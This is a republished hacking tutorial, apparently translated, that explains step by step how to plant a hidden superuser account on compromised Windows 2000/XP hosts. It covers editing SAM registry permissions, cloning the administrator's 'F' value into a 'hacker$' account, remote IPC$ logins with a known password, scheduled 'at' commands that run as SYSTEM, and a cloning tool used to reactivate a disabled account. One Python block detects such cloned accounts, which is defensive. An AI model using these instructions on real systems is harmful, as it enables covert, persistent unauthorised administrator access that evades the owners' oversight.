
Ways to hide a superuser (administrator) account in the system

2025-01-22 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/01 Report--

There are several ways to hide a superuser (administrator) account in a system, and many newcomers are not clear about how they work. The following explains them in detail for anyone who needs to understand them.

First, how to build a hidden super user in the graphical interface

The graphical method suits a local machine or a compromised host that has Terminal Services (port 3389) open. The author I mentioned above has a good method, but it is more complex: it uses psu.exe (a program that lets another program run as the SYSTEM user), and psu.exe has to be uploaded first if the target is a compromised host. The method described here does not use psu.exe. Windows 2000 has two registry editors, regedit.exe and regedt32.exe. In XP, regedit.exe and regedt32.exe are actually the same program, and key permissions are changed through "Permissions" in the right-click menu. Everyone is familiar with regedit.exe, but it cannot set permissions on registry keys; the biggest advantage of regedt32.exe is that it can. The account information of NT/2000/XP is stored under the HKEY_LOCAL_MACHINE\SAM\SAM key in the registry, but no user other than SYSTEM has the right to view it, so I first use regedt32.exe to give my own account "Full Control" permission on the SAM key. This makes the information under the SAM key readable and writable. The specific steps are as follows:

1. Suppose we are logged in to a compromised host through Terminal Services as the superuser administrator. First create an account, either on the command line or in the account manager: hacker$. Here I create it on the command line:

net user hacker$ 1234 /add

2. In Start / Run, type regedt32.exe and press Enter to run regedt32.exe.

3. Click "Permissions"; a window will then pop up.

Click Add to add the account I logged in with to the security list. I logged in as administrator, so I added administrator and set its permission to Full Control. Note: it is best to add your own login account or group and not to modify the existing accounts or groups, otherwise a series of unnecessary problems will follow. Once the hidden superuser has been built, come back here and delete the account you added.

4. Click "Start" → "Run", type "regedit.exe" and press Enter to start the registry editor regedit.exe. Open the key:

HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\hacker$

5. Export the keys hacker$, 00000409 and 000001F4 to hacker.reg, 409.reg and 1f4.reg. Edit the exported files with Notepad: copy the value "F" under key 000001F4, which corresponds to the superuser, over the value "F" under key 00000409, which corresponds to hacker$, and then merge 00000409.reg with hacker.reg.

6. On the command line, delete the user hacker$:

net user hacker$ /del

7. Press F5 in the regedit.exe window to refresh, then choose File → Import Registry File and import the modified hacker.reg into the registry.

8. At this point the hidden superuser hacker$ has been built; close regedit.exe. In the regedt32.exe window, change the permissions on the HKEY_LOCAL_MACHINE\SAM\SAM key back to what they were (just delete the added account administrator).

9. Note: once the hidden superuser has been built, the user hacker$ cannot be seen in the account manager, and it cannot be seen with the "net user" command on the command line either. However, its password can no longer be changed after it has been built: if you use the net user command to change the hacker$ password, the hidden superuser becomes visible in the account manager and cannot be deleted.
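
To check a machine for the result of steps 5 to 7, a defender can export the Users key and compare each account's "F" value with the RID in its key name. The following Python is an added example, not part of the original article; the sample export is constructed, and the position of the RID at offset 0x30 inside "F" is an assumption taken from the commonly documented layout.

```python
import re
import struct
from collections import defaultdict

USERS = r"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"
RID_OFFSET = 0x30  # assumption: little-endian RID sits at this offset inside "F"

def fake_f(rid):
    """Constructed 80-byte F value, wrapped the way regedit wraps hex data."""
    raw = bytes(RID_OFFSET) + struct.pack("<I", rid) + bytes(0x50 - RID_OFFSET - 4)
    hx = [f"{b:02x}" for b in raw]
    return ",".join(hx[:25]) + ",\\\n  " + ",".join(hx[25:])

# Constructed export: key 00000409 carries a copy of the F value of 000001F4.
SAMPLE_REG = "REGEDIT4\n\n" + "\n\n".join(
    f'[{USERS}\\{key}]\n"F"=hex:{fake_f(rid)}'
    for key, rid in [("000001F4", 0x1F4), ("000001F5", 0x1F5), ("00000409", 0x1F4)]
) + "\n"

KEY_RE = re.compile(r"^\[(.*)\\([0-9A-Fa-f]{8})\]$")

def parse_f_values(reg_text):
    """Map the RID taken from each key name to the raw bytes of its "F" value."""
    text = re.sub(r"\\\r?\n[ \t]*", "", reg_text)  # join hex continuation lines
    values, rid = {}, None
    for line in (l.strip() for l in text.splitlines()):
        m = KEY_RE.match(line)
        if line.startswith("["):
            ok = m and m.group(1).lower() == USERS.lower()
            rid = int(m.group(2), 16) if ok else None
        elif rid is not None and line.lower().startswith('"f"=hex:'):
            values[rid] = bytes.fromhex(line.split(":", 1)[1].replace(",", ""))
    return values

def find_cloned_accounts(reg_text):
    """Return (rid, reason) findings for accounts whose F value was overwritten."""
    values, findings, seen = parse_f_values(reg_text), [], defaultdict(list)
    for rid, f in sorted(values.items()):
        seen[f].append(rid)
        inner = struct.unpack_from("<I", f, RID_OFFSET)[0] if len(f) >= RID_OFFSET + 4 else rid
        if inner != rid:  # key name says one RID, the F value says another
            findings.append((rid, f"F value carries RID {inner:#x}"))
    for rids in seen.values():
        if len(rids) > 1:  # a byte-for-byte copy of another account's F value
            findings.append((tuple(rids), "identical F value"))
    return findings

if __name__ == "__main__":
    print(find_cloned_accounts(SAMPLE_REG))
```

The export has to be taken with rights to read the SAM key, for example from an offline copy of the hive during an investigation.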

Second, how to remotely establish a hidden superuser under the command line

This method uses the at command: scheduled tasks created with at run as SYSTEM, so the psu.exe program is not needed. To be able to use the at command, the compromised host must have the Schedule service running. If it is not enabled, it can be started remotely with the netsvc.exe tool from Streamer or with sc.exe. Any other method will also do, as long as the Schedule service can be started.

For command-line mode, a variety of connection methods can be used, such as SQLexec connected to port 1433 of MSSQL, or the telnet service, as long as you can get a cmd shell and have permission to run the at command.

1. First, find a compromised host; how to find one is not the topic here. Let's assume we have found one whose superuser is administrator with the password 12345678, and we now remotely create a hidden superuser on it from the command line. (The host in the example is a host on my local area network whose IP address I changed to 13.50.97.238. Please do not try this address on the Internet, so as not to disturb the real owner of that IP address.)

2. First establish a connection with the host. The command is:

net use \\13.50.97.238\ipc$ "12345678" /user:"administrator"

3. Use the at command to create a user on the host (if the at service is not started, it can be started remotely with Xiao Rong's netsvc.exe or with sc.exe):

at \\13.50.97.238 12:51 c:\winnt\system32\net.exe user hacker$ 1234 /add

The user name is created with a $ sign because, once the $ is appended, the user is not displayed by net user on the command line, although it can still be seen in the account manager.

4. Also use the at command to export the HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users key:

at \\13.50.97.238 12:55 c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users

/e is a parameter of regedit.exe, and the command must end with the key HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users. If necessary, put the command in quotes: "c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users".

5. Download hacker.reg from the host to the local machine and open it in Notepad for editing. The command is:

copy \\13.50.97.238\admin$\system32\hacker.reg c:\hacker.reg

The modification itself was described in the graphical-interface section, so it is not repeated here.

6. Copy the edited hacker.reg back to the host:

copy c:\hacker.reg \\13.50.97.238\admin$\system32\hacker1.reg

7. Check the host's time with net time \\13.50.97.238, and then delete the user hacker$ with the at command:

at \\13.50.97.238 13:40 net user hacker$ /del

8. Verify whether hacker$ has been deleted. Disconnect from the host with:

net use \\13.50.97.238 /del

Then try to connect to the host with the account hacker$:

net use \\13.50.97.238\ipc$ "1234" /user:"hacker$"

If the connection cannot be made, the account has been deleted.

9. Establish a connection with the host again:

net use \\13.50.97.238\ipc$ "12345678" /user:"administrator"

Then get the host's time, and import the copied hacker1.reg into the host's registry with the at command:

at \\13.50.97.238 13:41 c:\winnt\regedit.exe /s hacker1.reg

The /s parameter of regedit.exe means quiet mode.

10. Verify whether hacker$ has been created, in the same way as verifying above whether hacker$ had been deleted.

11. Then verify whether the user hacker$ has read, write and delete permissions. If you are still not sure, you can also verify whether it can create other accounts.

12. From step 11 we can conclude that the user hacker$ has superuser privileges: it was an ordinary user when I first created it with the at command, but it now has remote read, write and delete permissions.

Third, what if the compromised host does not have Terminal Services (3389) open and I do not want to use the command line?

In this case the graphical tools can also be used to create a hidden superuser remotely. Both regedit.exe and regedt32.exe can connect to a network registry, so regedt32.exe can set permissions on the remote host's registry keys and regedit.exe can edit the remote registry. The account manager can also connect to another computer, so it can create and delete accounts on the remote host. The specific steps are similar to those described above, so I will not repeat them, but this approach is unbearably slow.

There are two prerequisites:

1. First establish a connection with the remote host using net use \\<host IP>\ipc$ "password" /user:"superuser name"; only then can regedit.exe, regedt32.exe and the account manager connect to the remote host.

2. The remote host must have the Remote Registry service running (if it is not enabled, it can also be started remotely, because you have the superuser's password).

Fourth, use disabled accounts to create hidden superusers

1. First find out which accounts a careful administrator has disabled. In general, some administrators disable guest for security reasons, and other users may of course be disabled as well. In the graphical interface this is easy to see: the account manager shows a red cross on a disabled account. On the command line I have not found a good way other than running "net user username" for each account, one by one, to see whether it is disabled.

2. Here we assume that the user hacker has been disabled by the administrator. First I use Xiao Rong's superuser cloning program CA.exe to clone the disabled user hacker into a superuser (after cloning, the disabled user hacker is automatically activated): CA.EXE <host IP> Administrator <superuser password> hacker <hacker password>.
